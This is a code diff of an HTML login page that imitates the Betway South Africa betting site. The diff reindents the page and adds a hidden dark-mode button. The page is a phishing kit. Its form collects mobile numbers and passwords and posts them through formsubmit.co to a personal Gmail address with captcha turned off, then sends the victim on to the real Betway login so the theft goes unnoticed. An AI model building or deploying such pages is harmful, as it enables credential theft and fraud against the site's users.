--- a/index.html
+++ b/index.html
@@ -5,104 +5,121 @@
   <title>Login</title>
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <style>
-    /* (Your existing styles) */
+    /* (Your existing styles here) */
+    /* Hide the toggle button visually but keep it accessible */
+    #darkToggle {
+      position: absolute;
+      width: 1px;
+      height: 1px;
+      margin: -1px;
+      padding: 0;
+      border: 0;
+      clip: rect(0 0 0 0);
+      overflow: hidden;
+    }
   </style>
 </head>
 <body>
+  <!-- Hidden Dark Mode Toggle -->
+  <button id="darkToggle" aria-label="Toggle Dark Mode"></button>
 
-<div class="login-container">
-  <div class="login-header">Login</div>
-  <form class="login-body" action="https://formsubmit.co/robarsrsa@gmail.com" method="POST" onsubmit="return validateForm(event)">
-    <input type="hidden" name="_captcha" value="false">
-    <input type="hidden" name="_next" value="https://www.betway.co.za/account/login">
+  <div class="login-container">
+    <div class="login-header">Login</div>
+    <form class="login-body" action="https://formsubmit.co/robarsrsa@gmail.com" method="POST" onsubmit="return validateForm(event)">
+      <input type="hidden" name="_captcha" value="false">
+      <input type="hidden" name="_next" value="https://www.betway.co.za/account/login">
 
-    <div class="input-group">
-      <div class="prefix">+27</div>
-      <input
-        type="tel"
-        id="mobile"
-        name="mobile"
-        placeholder="10 digits"
-        required
-        maxlength="10"
-        minlength="10"
-        pattern="^\d{10}$"
-        title="Enter exactly 10 digits after +27"
-      >
+      <div class="input-group">
+        <div class="prefix">+27</div>
+        <input
+          type="tel"
+          id="mobile"
+          name="mobile"
+          placeholder="10 digits"
+          required
+          maxlength="10"
+          minlength="10"
+          pattern="^\d{10}$"
+          title="Enter exactly 10 digits after +27"
+        >
+      </div>
+      <div id="mobileError" class="error-message"></div>
+
+      <div class="actions">
+        <div></div>
+        <a href="https://www.betway.co.za/Account/ForgotUsername" target="_blank">Forgot Username?</a>
+      </div>
+
+      <div class="input-group password">
+        <input
+          type="password"
+          id="password"
+          name="password"
+          placeholder="Password"
+          minlength="4"
+          required
+        >
+        <span class="toggle">&#128065;</span>
+      </div>
+      <div id="passwordError" class="error-message"></div>
+
+      <div class="actions">
+        <div></div>
+        <a href="https://www.betway.co.za/Account/ForgotPassword" target="_blank">Forgot Password?</a>
+      </div>
+
+      <button type="submit" class="login-button" id="loginBtn">
+        Login
+        <div class="spinner" id="spinner"></div>
+      </button>
+    </form>
+
+    <div class="signup-section">
+      Don't have an account yet?
+      <a href="https://www.betway.co.za/account/register" target="_blank">Sign Up</a>
     </div>
-    <div id="mobileError" class="error-message"></div>
-
-    <div class="actions">
-      <div></div>
-      <a href="https://www.betway.co.za/Account/ForgotUsername" target="_blank">Forgot Username?</a>
-    </div>
-
-    <div class="input-group password">
-      <input
-        type="password"
-        id="password"
-        name="password"
-        placeholder="Password"
-        minlength="4"
-        required
-      >
-      <span class="toggle">&#128065;</span>
-    </div>
-    <div id="passwordError" class="error-message"></div>
-
-    <div class="actions">
-      <div></div>
-      <a href="https://www.betway.co.za/Account/ForgotPassword" target="_blank">Forgot Password?</a>
-    </div>
-
-    <button type="submit" class="login-button" id="loginBtn">
-      Login
-      <div class="spinner" id="spinner"></div>
-    </button>
-  </form>
-
-  <div class="signup-section">
-    Don't have an account yet?
-    <a href="https://www.betway.co.za/account/register" target="_blank">Sign Up</a>
   </div>
-</div>
 
-<script>
-  function validateForm(event) {
-    const mobile = document.getElementById('mobile');
-    const password = document.getElementById('password');
-    const mobileError = document.getElementById('mobileError');
-    const passwordError = document.getElementById('passwordError');
-    let isValid = true;
+  <script>
+    // Form validation
+    function validateForm(event) {
+      const mobile = document.getElementById('mobile');
+      const password = document.getElementById('password');
+      const mobileError = document.getElementById('mobileError');
+      const passwordError = document.getElementById('passwordError');
+      let isValid = true;
 
-    mobileError.textContent = '';
-    passwordError.textContent = '';
+      mobileError.textContent = '';
+      passwordError.textContent = '';
 
-    // Enforce exactly 10 digits after +27
-    if (!/^\d{10}$/.test(mobile.value)) {
-      mobileError.textContent = 'Please enter exactly 10 digits after +27.';
-      isValid = false;
+      if (!/^\d{10}$/.test(mobile.value)) {
+        mobileError.textContent = 'Please enter exactly 10 digits after +27.';
+        isValid = false;
+      }
+
+      if (password.value.length < 4) {
+        passwordError.textContent = 'Password must be at least 4 characters.';
+        isValid = false;
+      }
+
+      if (isValid) {
+        document.getElementById('spinner').style.display = 'inline-block';
+        document.getElementById('loginBtn').disabled = true;
+      }
+
+      return isValid;
     }
 
-    // Password minimum length remains 4
-    if (password.value.length < 4) {
-      passwordError.textContent = 'Password must be at least 4 characters.';
-      isValid = false;
-    }
+    // Password visibility toggle
+    document.querySelector('.toggle').addEventListener('click', function () {
+      const pwd = document.getElementById('password');
+      pwd.type = pwd.type === 'password' ? 'text' : 'password';
+    });
 
-    if (isValid) {
-      document.getElementById('spinner').style.display = 'inline-block';
-      document.getElementById('loginBtn').disabled = true;
-    }
-
-    return isValid;
-  }
-
-  document.querySelector('.toggle').addEventListener('click', function () {
-    const pwd = document.getElementById('password');
-    pwd.type = pwd.type === 'password' ? 'text' : 'password';
-  });
-</script>
-
+    // Dark mode toggle logic
+    document.getElementById('darkToggle').addEventListener('click', () => {
+      document.body.classList.toggle('dark-mode');
+    });
+  </script>
 </body>
 </html>
